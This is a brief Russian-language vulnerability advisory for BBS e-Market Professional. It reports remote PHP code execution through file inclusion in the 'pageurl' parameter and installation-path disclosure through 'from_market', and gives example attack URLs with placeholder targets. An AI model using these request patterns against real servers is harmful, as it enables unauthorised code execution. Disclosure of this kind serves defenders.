Программа: BBS e-Market Professional 

Удаленный пользователь может выполнить произвольный PHP код на целевой системе. 

Пример: 

http://[TARGET]/becommunity/community/ index.php?pageurl=[injection URL]
http://[TARGET]/becommunity/community/ index.php?from_market=Y&pageurl =[injection URL]

Также удаленный пользователь может раскрыть инсталляционный путь:

http://[TARGET]/becommunity/community/ index.php?from_market=[char]

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии